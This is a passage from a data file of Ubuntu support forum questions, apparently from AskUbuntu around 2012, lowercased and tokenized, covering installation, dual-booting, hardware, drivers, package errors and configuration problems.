the method in how to add a shortcut on desktop . but this does n't help.the only changes made to the system , apart from accepting the new linux kernel , are as above . i would be grateful for advice on how to get my shortcuts working again .
221104	transferring files from pc to ubuntu pc on same network	i recently installed a fresh version of ubuntu 12.04 i wanted to transfer my old files from my pc that is running windows , to my other pc which now has ubuntu installed on it . they are both on the same network , i feel like this should be something easy to do , but i cant figure it out at all . any help would be appreciated thank you . i downloaded and installed samba on my linux computer , and set up a share , but i can not find the directory on my windows machine . where do i find it ?
221106	ghosting program for ubuntu 12.10	i am looking to figure out how to set up a mass backup system for a computer network ( of about 25 ) and am looking for a ghosting program that makes an image of the entire system for backup/recovery purposes . while clonezilla would work.. you have to manually boot us the cd for it . i am looking for a program that runs inside ubuntu that sends a system image backup off to the network server at set times , then when needed could also be used to burn the clone back to the machine . another words- automatically and the only time i have to do anything to it is when i need to burn a backup back to a 'crapped ' machine . any ideas ?
221108	computer wo n't recognize usb trying to re-install	ii 'm trying to re-install ubuntu i 've tried ` sudo dpkg-reconfigure -phigh -a ' but that did n't work . so i went to bios enabled usb legacy and but booting my usb first . but the computer does not recognize my flash drive even though it still recognizes my usb keyboard and mouse . i only got in once but there was no re-install option or anything related to it . all there was , was memory check and a choice named `` ubuntu '' that just takes me back to the login page .
221109	how do i uninstall deepin software center ?	i installed deepin software center yesterday.but now when i want to uninstall it , i cant find it on ubuntu software center 'installed ' section . do not know the sudo code too . can anyone help ?
221113	low volume/headphone quality sound on optiplex 755 with ubuntu 12.04	i set up my optiplex 755 sff with ubuntu 12.04 . i moved from gentoo just yesterday , and i know i can get good quality sound from my hardware . but on ubuntu 12.04 , i have an audio problem . the issue is that the audio volume over both the headphones ( front audio jack ) and the speakers ( rear audio jack ) is very low , and seems to have been adjusted for headphones ( almost no bass , reduced mid range ) . i have a hdmi video card ( radeon 5450/hdmi ) , but i am not using that for the sound . i output the sound via audio jack via the on-board intel audio . btw , sound plays from my speakers even if my headphones are connected . i have tried pretty much every thing i have seen in this forum , and i know of some issues with intel audio , so i added options snd-hda-intel model=basic and options snd-hda-intel power_save=10 power_save_controller=n to /etc/modprobe.d/alsa-base.conf ( see for e.g. , headphone sound only since 12.04 upgrade ) . i have also tried a bunch of questions that popped up when i started typing this question , both above the text box , and to the right of it . no help whatsoever . i have installed pavucontrol ( pulse audio control ) , and gnome-alsamixer . no effect whatsoever . i also tried hda-jack-retask per someone 's suggestion here , but that did not work either . if this is a bug , i would appreciate any workarounds . thanks . anyone have a clue how to get decent sound from this box ? my alsa-info is at the alsa site code dump .
221115	how can i install ubuntu 12.04 on samsung np900x3d-a01bg	i tried to install ubuntu on a brand new samsung np900x3d-a01bg . it has 128gb ssd with many different partitions , many of them have the name recovery in them . one partition is for drive c and it is the largest . i decided to shrink it using easeus partition master home edition to make room for ubuntu . i have done this many times with other laptops . the program said that it needs to reboot to complete the operation . however , on reboot i get this message : recovery your pc needs to be repaired a required device is n't connected or ca n't be accessed . error code : 0xc0000225 [ a text saying i should use recovery tools on my installation media to fix the issue. ] press enter to try again press f8 for start-up settings press esc for uefi firmware settings enter returns me to this screen , and so does f8 . esc enters mein bios but i can not get to recovery . could you please help me : understand this problem get out of it install ubuntu in dual boot mode with windows 8 on this laptop . i would really appreciate any help . cheers , itso stefanov
221119	how to detect image dimensions and run commands on them ?	i have a directory full of images , some of which are portrait-sized instead of landscape-sized , and i want to open the portrait-sized ones with an image editor . i can run the imagemagick command identify and i get an output like something.jpg jpeg 1920x1255 1920x1255+0+0 8-bit directclass 159kb 0.000u 0:00.000 . how can i have a script interpret this output , i.e . decide which is bigger , the 1920 or the 1255 , and then run a command on it if it is ?
221130	how do i resolve *.internalhost to a given ip address ?	i want all dns requests that are for *.internalhost to resolve to the same ip address . how is this possible using ubuntu ?
221133	eeepc 1000ha does not suspend on ubuntu 12.10	this functionality worked normally in ubuntu 12.04 . since upgrading the computer does not respond to clicking on suspend .
221135	issue with vmd install not working any more . lubuntu 12.10	i had vmd working on my lubuntu 64 bit but all of a sudden i was getting errors when i tried to run it . i tried reinstalling it but no joy . the error i now get when i try to run rlwrap : no match . i do n't use make unless i have to so i do n't know all that much about it . i have removing vmd completely to see if that helped . i tried the suggestions it made ( i am sorry , i ca n't remember the details but it was moaning about cuda and my graphic drivers for a while . i had not updated it or anything . it was fine until i went away from the computer and came back to it like that . if nobody can help i will try reinstalling my system and see if that helps .
221139	ubuntu 8.04 wo n't start the setup	i am trying to run ubuntu 8.04 iso on a virutal pc . it comes up with the ubuntu install screen and when i click the install link , it says loading linux kernel , then it just shuts down my virtual pc . i was wondering how i could fix this problem ?
221142	can not access deja-dup backup	my laptop is being repaired and i need to access the files on my encrypted hdd ( which i regularly back up with deja-dup ) . is there a way of accessing these backed-up files through windows or mac ?
221144	how can i make unity maximize windows like gnome 2 , kde , xfce et al ?	unity , of course , puts the window buttons and menus at the top left for maximized windows and removes the titlebar . i hate this . is there a way to make it stop and just make the windows as big as the screen ? i 'm in 12.10 , if that helps .
221145	authentication is required to change user data	i set administrator password to blank . now , i ca n't install new programs ( message see in title ) , or change the admin password ( `` change '' button grayed out ) . i tried a suggested fix from inside the terminal , but ca n't type anything into the sudo authentication field .
221147	ubuntu 12.10 install stuck at first step	i 'm trying to install ubuntu 12.10 from a dvd-r disk , and everything is just fine until i get to the first window after clicking install ubuntu i checked the box download updates while installing and also the install third-party software box . after clicking next , however , the install just hangs there . i 've been waiting for over an hour now and all i see is the mouse cursor showing that it 's loading . what should i do to get past this ? thanks !
221148	vim struggles when copy-pasting large blocks of text in from an external window	i select and copy a large block of plain text from some file ( e.g . gedit ) . i run : set paste and then enter insert mode , and paste the text in using the right mouse-button menu . vim them uses 100 % cpu for the next several minutes before successfully pasting my text in . the text is usually only a few pages , and takes less than a second to paste into other applications ( gedit window , web window , etc ) . what is vim doing with all those clock cycles and how can i make this more efficient ?
221151	hp mini 5102 ethernet does not work after suspend on lubuntu 12.10	ethernet works fine after system is rebooted the onboard card is seen in 'lspci ' as : 43:00.0 ethernet controller : marvell technology group ltd. yukon optima 88e8059 [ pcie gigabit ethernet controller with avb ] ( rev 11 ) after system being suspended the sky2 driver loads but does not enable the nic . i have noticed that it happens when pc is left suspended for longer period of time ( few houres ) trying to reproduce it i have tried to load the sky2 driver with modprobe sky2 . unfortunately typing ifconfig -a for the onboard ethernet adapter does not list the driver once the sky2 driver is loaded . i have searched internet and i found some information about a bug in kernel . hovewer it was reported in 2010 so i hope it has been fixed . here it is http : //lists.opensuse.org/opensuse-bugs/2010-02/msg01473.html
221163	what does ubuntu `` consists '' of ? how do i find out ?	a typical ubuntu ( or any linux ) installation is not just a kernel , it 's a bunch of things- a file system , a windows manager , a set of tools and other frameworks . i would like to know what ubuntu ( or any other linux distro for that matter ) is assembled from . where do i find this information ( or alternatively- perhaps someone here could produce the list themselves ) ?
221167	ca n't install anthy	i installed japanese in the language support , and then i went to ibus preferences input method tab , selected `` customize active input methods '' and then when i click select an input method , i can only see china . why there 's no japanese ? ibus version : 1.4.1 os : linux ubuntu 12.10 de : gnome-shell 3
221170	possible to extract locked archives ?	i would like to bypass the lock on a .rar archive , is this possible ?
221183	i accidentally permanently deleted a file , how can i recover it ?	it 's probably best to ask for advice on a support forum . is it possible to recover a deleted file ?
221186	trying to install ubuntu on imac	i am trying to install ubuntu on my imac 17 '' , but when it asks what i want to do , i ca n't install ubuntu alongside mac os x 10.6.8 ; all it says is just to replace osx with ubuntu . what can i do ?
221190	had ubuntu/7 on my system reformated and ubuntu stopped working	well i had got a virus on the windows part of my computer . i was n't thinking and a reformatted the hard drive ... kinda screwed things up . normally before this happened i would turn on my computer and select ether ubuntu or 7 . from what i know ubuntu is not on my computer . ( not that i know much still a newbie to ubuntu as well as dual booting ) . when i turn on my computer i still get asked whether i want to boot into windows/ubuntu . i would like to remove it from asking to boot into ubuntu and get it back to just windows . after that i probably go back and re install ubuntu . many thanks for any help i receive ! ! ! !
221191	ca n't install ubuntu 12.04 sony vaio serie e 2012	my sony vaio serie e , not start the boot . ubuntu 12.04-lts-amd64 ( desktop ) serie : sve14a25cxs processor : intel core i5 ( 3 generation ) does anyone have any idea ? thank you very much .
221192	undelete program	are there any ways to see deleted items already removed from trash , and restore them ? i believe my picture folder from my data partition has been deleted . kids and open laptops do not mix
221195	how can i send vboxheadless to the background so i can close the terminal ?	i would like to start virtual machines in headless mode . the advantage : i can logoff from the desktop , and the machine will continue to run . however , starting the virtual machine blocks the terminal from closing . is there a clever solution to have everything like a service in the background ? if i do 'sudo service ntp start ' it will start , and then i can close the terminal . i could do the following , but i 'm not happy with it : nohup vboxheadless -s `` myguest '' & log in from a login shell ( tty1-6 ) which is equipped with byobu , start the vm , and instead of logging out i could detach with f6 . better way of doing it ?
221196	upstart job : run task once per event	i 'm a little confused regarding how jobs start on upstart events . to illustrate my misunderstanding , i have four upstart jobs that look like the following : job 1 : start on local-filesystems task script echo `` job 1 ran '' > > /tmp/job1 end script job 2 : start on ( local-filesystems and net-device-added ) task script echo `` job 2 ran '' > > /tmp/job2 end script job 3 : start on ( local-filesystems and bluetooth-device-added ) task script echo `` job 3 ran '' > > /tmp/job3 end script job 4 : start on local-filesystems or ( local-filesystems and net-device-added ) or ( local-filesystems and bluetooth-device-added ) task script echo `` job 4 ran '' > > /tmp/job4 end script i expect the following file contents after a reboot : /tmp/job1 : job 1 ran /tmp/job2 job 2 ran /tmp/job3 job 3 ran /tmp/job4 job 4 ran job 4 ran job 4 ran i expect job 4 to have ran three times because it can be started by three separate sets of events , all of which occur as proven by the other jobs . but my expectations are incorrect ; the files actually contain the following : /tmp/job1 : job 1 ran /tmp/job2 job 2 ran /tmp/job3 job 3 ran /tmp/job4 job 4 ran why is job4 only being run once , even though all three sets of events are occurring ? is there any way to achieve the behavior of running this job whenever any of the signals occur , regardless of how many times the job actually runs ? if it helps , i edited it to print out the $ upstart_events variable to see what events are causing job 4 , and it 's local-filesystems . to summarize : i would like job 4 to run on the local-filesystems event , and on the net-device-added event ( as long as local_filesystems has occurred as well ) , and on the bluetooth-device-added event ( as long as local_filesystems has occurred ) . how do i make that happen ? thank you !
221198	windows installer `` installation size ''	what is the difference between all the installation size tabs ? it is automatically set at 18 gigs , but it is possible for me to put 30 ? what do i choose during installation ?
221200	are 64-bit and 32-bit versions included in the same iso ?	http : //releases.ubuntu.com/precise/ does ubuntu now release 64-bit and 32-bit under the same iso ?
221204	restart trouble ubuntu 12.10	i`ve installed ubuntu 12.10 on 3 different machines : acer aspireone netbook lenovo t60 notebook desktop - p5p77 - asus mainboard - i3 - porcessor i have the same issue on all of themm they won`t restart ( shut down work ) , i can see the proceses are killed but it freezez on black screen total iresponsive . even when i access the bios config to modify something then save & exit then restart i get the same thing . this is the same for all 3 machines . i also cleaned up the desktop system , last version of bios update , full hdd format , fresh win7 installed ( practicly no trace of the old ubuntu 12.10 ) still the same problem . some time ago i had ubuntu 11.10 on the desktop system , it worked perfectly . i also mention that i tried all combinations of acpi settings in bios , unfortunately with no results . please advice , i am a little desperate : ) ) best regards , cristian , romania
221205	unable to boot ubuntu 10.04 lts after hibernation	i have a desktop which i installed ubuntu 10.04 . i hibernated the desktop and have been unable to boot ubuntu since then . the ( usb ) keyboard seems deactivated and does not show any lights when i turn on the desktop . i set a bios password and cant get beyond the prompt for password cos i cant input the password with the keyboard ( so booting wont occur ) unfortunately , i can not boot from a usb to reinstall ubuntu . what can i do ? please , i am a beginner and i am not familiar with using command terminal/lines apologies if this question has previously been answered ( i could not find any answer to help me ) thanks ! ! ! ! ! ! !
221206	ibus icon is missing at startup ?	after some installing , tweaking , ... the ibus icon is missing at startup , although it 's working fine : $ ps -ef | grep [ i ] bus quanta 1918 1890 0 09:54 ? 00:00:01 /usr/bin/ibus-daemon -- xim quanta 1946 1918 0 09:54 ? 00:00:00 /usr/lib/i386-linux-gnu/ibus/ibus-gconf quanta 1948 1918 0 09:54 ? 00:00:00 /usr/bin/python /usr/share/ibus/ui/gtk/main.py quanta 1951 1 0 09:54 ? 00:00:00 /usr/lib/i386-linux-gnu/ibus/ibus-x11 -- kill-daemon quanta 1987 1918 0 09:54 ? 00:00:00 /usr/lib/ibus-unikey/ibus-engine-unikey -- ibus i can make it appear by restarting the ibus-daemon : $ ibus-daemon -x -r -d i also have tried to add the ibus to the system tray whitelist but nothing changes . how can i troubleshoot this issue ?
221208	windows 8 fresh install and 12.10 dual boot	i have a question concerning windows 8 and dual booting with ubuntu 12.10 . i 've researched answers here , but have n't seen a question that resembles mine exactly : ubuntu install and dual boot with windows 8 uefi uefi hardware and dual booting with windows ubuntu 12.10 wont boot specifically , i 'm pondering installing a fresh install of windows 8 ( for game purposes ) , and a fresh install of 12.10 and dual booting them . i 'm not sure if uefi is hardware specific or software specific , and i 'm worried if i try to implement the dual boot i 'm going to run into uefi issues and have to go through the grief of getting things up and running by following a long and tedious procedure . can i , starting with windows 8 , then install 12.10 without too much hassle ? my current hardware config is : microstar motherboard 7514 with an intel core 2 duo processor . the drive i 'm thinking of using is a western digital tb drive , new out of the box . as always , any help would be appreciated . thanks .
221209	how can i instal shockwave on ubuntu	i got this computer from someone and it had ubuntu installed on it . i like it but i find it complicated and i have been trying to download and every time i try to install something an error comes up archive : /home/singh/downloads/shockwave_installer_full.exe [ /home/singh/downloads/shockwave_installer_full.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/singh/downloads/shockwave_installer_full.exe or /home/singh/downloads/shockwave_installer_full.exe.zip , and can not find /home/singh/downloads/shockwave_installer_full.exe.zip , period . please help me uninstall ubuntu and get windows back or help me get these downloads to work .
221211	waiting for required medium software center	i 'm trying to install the proprietary amd drivers through software sources . i tick the box for fglrx-updates , and it says applying changes and fills 10 % of a progress bar . it then sites there for hours ( i left the computer unattended ) . trying to get this process to finish , i found that the ubuntu software center progress tab display a message reading : applying changes : waiting for required medium what in the world does that mean and how can i get it to move on ?
221212	installation wo n't finish	i installed ubuntu 12.10 ( 32-bit ) on my acer aspire one notebook and replaced the windows 8 consumer preview . everything went fine , but right before the installation finished , it got stuck . the loading bar at the bottom is full , and it says `` copying installation logs , '' but my mouse wo n't move and it 's been at this point for almost an hour . also , the mouse is in the loading spin , so i know my computer did n't freeze . should i just restart now ? i 'm not sure if it 's at the last stage , but it seems like it is , and this has taken more than the rest of the installation together . edit- i had my computer go in sleep mode for a minute and now i can move the mouse again . when i click the `` copying.. '' part , it says `` activation ( eth1 ) stage 4 of 5 complete '' but `` 5 of 5 '' ( i assume that comes next ) is n't starting .
221213	why does n't rhythmbox just quit when i close the widow ?	it seems to me if one completely closes the window of an application , that application should cease . however , this does not seem to be the case with rhythmbox . why ?
221219	is there another application like nokia pc suite for ubuntu ?	i 've been looking for an alternative nokia pc suite for ubuntu . i 'm tired of switching os , and i 'm tired of using windows it is so boring me . not wammu , gammu , nokuntu , ginokki and series 60 . they do n't work . via cable . i need an application that can detect via cable ( because i have a very different reason why i need it to detect via cable ) . also after installing in wine it ca n't detect the phone and i think the installation did n't finish correctly . thank you !
221220	what happened to nautilus search	what happened to the search box that appears on a folder when you press ctrl+f ? i used to be able to type and then navigate with the arrows ( only between files that matched ) and enter would open the file ( not perform the search like in windows , which is what it does now ) .
221225	how to prevent a process to run ?	i want some process not to run because i do n't need them . is there a way to prevent from running some processes ? after start up if possible or by opening applications with is it `` child process '' ( i mean under ) .
221226	why is sudo bash different from regular bash	problem description : i am using something called play framework in my development which requires me to make the python script play available in the path . hence i create a symbolic link in /usr/local/bin ... now i have written a shell script ( call it status.sh ) which calls this python script as follows : play status < some values here related to my app > & > /tmp/xyz.txt and this shell script then sends me the file via email . this works perfectly when i execute the script as follows ./script.sh . however when the script is executed as a cron expression everyday i get an output from stderr saying 'play : command not found ' . hence i did some digging on my own and here are my findings : echo $ path when i am on the shell shows that i have /usr/local/bin available to me hence i can successfully execute the command play status however when i type in sudo bash and then echo $ path i do not have the path /usr/local/bin anymore . it is a limited set of folders ( one of them being /usr/bin ) . q : why this behavior ? ! i fail to understand why the path is different . also as a workaround would you suggest i do : new symbolic link from /usr/bin to /usr/local/bin ( what are the side effects of this ? ) remove /usr/local/bin sym link altogether and only use /usr/bin is there a convention that i am not following here for linking new programs and executing them from $ path ? thanks .
221230	recovery from hell - undeleting partition overwritten by xubuntu 12.10 installer ?	this is turning into a nightmare - following my initial recovery of my two partitions , i went to install xubuntu 12.10 ( again ) . at this time i had two partitions - one of ~39 gb had zorin os 6 installed on it , and another of ~33 gb had nothing installed , just a few files in it that i had manually backed up ( moved ) there . when i got to the partitioning step , i chose `` replace zorin os 6 with xubuntu 12.10 '' , along with lvm , naturally thinking that the installer would n't touch the second partition , since zorin was n't installed on it . i was dead wrong . upon booting my newly installed xubuntu 12.10 , i found in gparted that there were only two partitions - ~255mb , which appears to have the boot stuff in it ( it 's flagged boot in gparted ) , and another of ~74 gb . question : is there any way to salvage my old files on the non-zorin ext3 partition ? i 'm really upset i made such a dumb move ( again ... ) , and any and all help is appreciated very , very much !
221231	weather-indicator : networking error : http error 403 : forbidden ?	here 're the ~/.cache/indicator-weather.log : [ fetcher ] 2012-11-24 11:45:52,619 - debug - indicator : getweather for location 'hanoi , ha náťi , vietnam' [ fetcher ] 2012-11-24 11:45:52,620 - debug - indicator : getweather : updating weather report [ fetcher ] 2012-11-24 11:45:52,620 - debug - location : default weather source 'google ' chosen for 'hanoi' [ fetcher ] 2012-11-24 11:45:53,019 - error - indicator : networking error : http error 403 : forbidden [ fetcher ] 2012-11-24 11:45:53,020 - debug - indicator : updateweather : waiting for 'cacher ' thread to terminate [ fetcher ] 2012-11-24 11:45:53,020 - error - indicator : updateweather : could not get weather , leaving cached data
221233	unable to install 12.10 on asus r500v	i have been unable to get beyond the grub boot screen of the live dvd/usb . the try ubuntu without installing , install ubuntu , etc menu shows , and i have tried adding and replacing nomodeset and no splash with neither helping . even check disc for defects does not display anything when selected . i am at a complete loss as to how to fix this one . i have had many successful installs in the past , but this is definitely a first for me . just as fyi , gfx card : geforce gt 635m i realize this particular card has optimus on it , however even the alternative boot/command line install fails to load . any help would be appreciated . i realize there have been multiple threads on this , but none of the methods within them have solved this yet . as reference , i have followed the following page : my computer boots to a black screen , what options do i have to fix it ? moreover , i have confirmed that the particular iso that i have burned can be booted through virtual box .
221241	how to install packages without documentation ?	stage i am using ubuntu 12.04 . i want to install some texlive packages , but they requires their own documentation packages . for example : texlive-latex-extra pulls texlive-latex-extra-doc . texlive-pictures pulls texlive-pictures-doc . etc . documentation packages are very very heavy , so avoid downloading them results in a faster installation . question how can i install packages without documentation ?
221249	two different ssd drives , which one to mount for home ?	i 've had a 128gb toshiba ssd on my t400 and have just bought a new 240gb intel ssd ( 335 series ) . i want to have a clean new dual boot install of ubuntu and windows 7 . with my sata ii system , the new intel ssd should probably be 1.3-1.5 times faster on buffer read and at least twice faster on cached read . now i need to know which one to mount for my home directory and which one to use for the os installs . option 1 ) use faster ssd for windows+linux+home and use the other ssd for extra space . option 2 ) use faster ssd for windows+linux and mound home on the other ssd . option 3 ) user slower ssd for windows+linux and mount home on the other ssd . option 4 ) some type of raid array setup . typical programs on linux : chrome , thunderbird ( heavy ) , occasional torrent download . windows : starcraft ii .
221250	use encrypted home or a ata password on a intel 330 ssd ?	i plan to buy a intel 330 ssd ( encrypts all data whit aes 128 ) and use it in a asus eeepc 1215n ( supports ata password ) whit the latest *ubuntu and windows 7 . i 'm a fair paranoid user and security mathers but i also want a good performance and no trouble . the important data will be in ~ and is not needet to be accessible from windows . but to have everything encrypted would be welcome . is it better to use a encrypted home or simply set a ata password ( the data on the ssd is encrypted by the device regardless ) ? which is more secure and easier to handle ? i 'm specially worried about suspend to ram / drive ( is it working and still secure ? ) . i know suspend to drive is not possible whit a encrypted swap ( i need a swap ) . and i read about hot swap attacks to selfencrypted devices ( but on this laptop the ssd is under the keyboard and hard to reach ) . whit a encrypted home and swap , how much would be the performance loss ( as this device gains speed through compressing the data ) ? is it possible to uses the ata password to login the usere ? thanks for any thoughts !
221254	package operation failed in package management	when i try to install or remove any application from ubuntu software center i get this error : package operation failed . as suggested in many posts in this forum i did this sudo apt-get -f install : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : codeblocks codeblocks-contrib codeblocks-contrib-dbg codeblocks-dbg codeblocks-dev libwxsmithlib-dev libwxsmithlib0-dev suggested packages : libwxgtk2.8-dev wx-common the following new packages will be installed : libwxsmithlib-dev the following packages will be upgraded : codeblocks codeblocks-contrib codeblocks-contrib-dbg codeblocks-dbg codeblocks-dev libwxsmithlib0-dev 6 upgraded , 1 newly installed , 0 to remove and 243 not upgraded . 5 not fully installed or removed . need to get 0 b/84.4 mb of archives . after this operation , 73.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 159995 files and directories currently installed . ) unpacking libwxsmithlib-dev ( from ... /libwxsmithlib-dev_10.05-2_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libwxsmithlib-dev_10.05-2_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/wxsmith/contrib/include/wx/propgrid/advprops.h ' , which is also in package wxsmith-headers 10.05-1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to replace codeblocks-dev 10.05-1 ( using ... /codeblocks-dev_10.05-2_i386.deb ) ... unpacking replacement codeblocks-dev ... dpkg : error processing /var/cache/apt/archives/codeblocks-dev_10.05-2_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/codeblocks/scripting/sqplus/sqplusconst.h ' , which is also in package codeblocks-headers 10.05-1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libwxsmithlib-dev_10.05-2_i386.deb /var/cache/apt/archives/codeblocks-dev_10.05-2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) in gui under package operation failed dialogue box i get this : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 159995 files and directories currently installed . ) unpacking libwxsmithlib-dev ( from ... /libwxsmithlib-dev_10.05-2_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libwxsmithlib-dev_10.05-2_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/wxsmith/contrib/include/wx/propgrid/advprops.h ' , which is also in package wxsmith-headers 10.05-1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to replace codeblocks-dev 10.05-1 ( using ... /codeblocks-dev_10.05-2_i386.deb ) ... unpacking replacement codeblocks-dev ... dpkg : error processing /var/cache/apt/archives/codeblocks-dev_10.05-2_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/codeblocks/scripting/sqplus/sqplusconst.h ' , which is also in package codeblocks-headers 10.05-1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libwxsmithlib-dev_10.05-2_i386.deb /var/cache/apt/archives/codeblocks-dev_10.05-2_i386.deb error in function : dpkg : dependency problems prevent configuration of codeblocks : codeblocks depends on libcodeblocks0 ( = 10.05-1 ) ; however : version of libcodeblocks0 on system is 10.05-2. codeblocks depends on codeblocks-common ( = 10.05-1 ) ; however : version of codeblocks-common on system is 10.05-2. dpkg : error processing codeblocks ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of codeblocks-contrib : codeblocks-contrib depends on libwxsmithlib0 ( = 10.05-1 ) ; however : version of libwxsmithlib0 on system is 10.05-2. codeblocks-contrib depends on codeblocks ( = 10.05-1 ) ; however : package codeblocks is not configured yet . dpkg : error processing codeblocks-contrib ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libwxsmithlib0-dev : libwxsmithlib0-dev depends on wxsmith-dev ( = 10.05-1 ) ; however : package wxsmith-dev is not installed . dpkg : error processing libwxsmithlib0-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of codeblocks-dbg : codeblocks-dbg depends on codeblocks ( = 10.05-1 ) ; however : package codeblocks is not configured yet . dpkg : error processing codeblocks-dbg ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of codeblocks-contrib-dbg : codeblocks-contrib-dbg depends on codeblocks-contrib ( = 10.05-1 ) ; however : package codeblocks-contrib is not configured yet . codeblocks-contrib-dbg depends on codeblocks-dbg ( = 10.05-1 ) ; however : package codeblocks-dbg is not configured yet . dpkg : error processing codeblocks-contrib-dbg ( -- configure ) : dependency problems - leaving unconfigured
221257	laptop battery charging capacity reduced to 52 %	i have been using ubuntu 11.04 on dell inspiron 14r ( n5010 ) laptop for last three months . before i switch to ubuntu my laptop battery used to give 2.5 hrs to 3 hrs back-up . but since i have been using ubuntu , it has been reduced to 1hr to 1.5 hrs at max . i tried following commands : cat /proc/acpi/battery/bat0/state which gave result as : present : yes capacity state : ok charging state : charged present rate : 1 ma remaining capacity : 4400 mah present voltage : 12407 mv then i tried acpi -b , that resulted in : battery 0 : unknown , 100 % when i gave command as upower -i /org/freedesktop/upower/devices/battery_bat0 native-path : /sys/devices/lnxsystm:00/device:00/pnp0c0a:00/power_supply/bat0 model : dell w7h3n08 serial : 7114 power supply : yes updated : sat nov 24 11:25:34 2012 ( 21 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : fully-charged energy : 48.4748 wh energy-empty : 0 wh energy-full : 48.4748 wh energy-full-design : 48.9595 wh energy-rate : 0.011017 w voltage : 12.408 v percentage : 100 % capacity : 52.9253 % technology : lithium-ion someone please let me know , what is going wrong with my laptop ? how can i get charging with full capacity ?
221263	gui for the diction tool	i just stumbled upon the excellent diction tool . it 's great to check the writing style of my latex files , the problem is , however , i can only use it through the command line . the output , while being useful is very difficult to sift through . is there a gui for the diction tool ? even an editor or syntax highlighting support in the form of a text editor would be useful .
221270	`` /usr/bin/ld : skipping incompatible /usr/lib/x86_64-linux-gnu/libx11.so when searching for -lx11 '' error when installing htk	i was trying to install a library named htk . after downloading and extracting the source files , i run sudo ldflags= '' -l /usr/lib/x86_64-linux-gnu '' ./configure under the root directory of htk.then i typed sudo make all and got this error : a - hmodel.o a - hnet.o a - hparm.o a - hrec.o a - hshell.o a - hsigp.o a - htrain.o a - hutil.o a - hvq.o a - hwave.o a - strarr.o ranlib htklib.a make [ 1 ] : leaving directory `/home/rosfuerte/desktop/hw2_1/htk/htklib' ( cd htktools & & make all ) \ || case `` '' in *k* ) fail=yes ; ; * ) exit 1 ; ; esac ; make [ 1 ] : entering directory `/home/rosfuerte/desktop/hw2_1/htk/htktools' if [ ! -d /usr/local/bin -a x_ = x_yes ] ; then mkdir -p /usr/local/bin ; fi if [ xhslab = xhslab ] ; then \ gcc -o hslab -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i../htklib -dphnalg hslab.c ../htklib/htklib.a -l/usr/x11r6/lib -l /usr/lib/x86_64-linux-gnu -lm -lx11 ; \ else \ gcc -o hslab -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i../htklib -dphnalg hslab.c ../htklib/htklib.a -l/usr/x11r6/lib -l /usr/lib/x86_64-linux-gnu -lm ; fi hslab.c : in function 「fileexists」 : hslab.c:1209:12 : warning： variable 「isexf」 set but not used [ -wunused-but-set-variable ] hslab.c : in function 「dospecial」 : hslab.c:1596:13 : warning： ignoring return value of 「system」 , declared with attribute warn_unused_result [ -wunused-result ] /usr/bin/ld : skipping incompatible /usr/lib/x86_64-linux-gnu/libm.so when searching for -lm /usr/bin/ld : skipping incompatible /usr/lib/x86_64-linux-gnu/libm.a when searching for -lm /usr/bin/ld : skipping incompatible /usr/lib/x86_64-linux-gnu/libx11.so when searching for -lx11 /usr/bin/ld : skipping incompatible /usr/lib/x86_64-linux-gnu/libx11.a when searching for -lx11 /usr/bin/ld : can not find -lx11 /usr/bin/ld : skipping incompatible /usr/lib/x86_64-linux-gnu/libc.so when searching for -lc /usr/bin/ld : skipping incompatible /usr/lib/x86_64-linux-gnu/libc.a when searching for -lc collect2 : ld returned 1 make [ 1 ] : *** [ hslab ] error 1 make [ 1 ] : leaving directory `/home/rosfuerte/desktop/hw2_1/htk/htktools' make : *** [ htktools ] error 1 does anyone know how to solve this problem ? thanks in advance .
221272	not given the option to install 12.10	i followed the guide on the website to upgrade distributions . i was not effective at doing this , however , update manager does n't give me the option to download the new release . i 'm not very effective at creating and implementing terminal commands . if someone could show me which commands to copy and paste into terminal in the form of a step-by-step guide , that would be greatly appreciated .
221273	steam : not rendering text on ubuntu 12.10 64 bit	i am having a problem with steam and games on my system . it seems to not be rendering any text . here is a screenshot of what it look like . i am also getting a error in the console that looks like this http : //pastebin.com/gqs70avd . i 've tried re-install it but that did not seem to help .
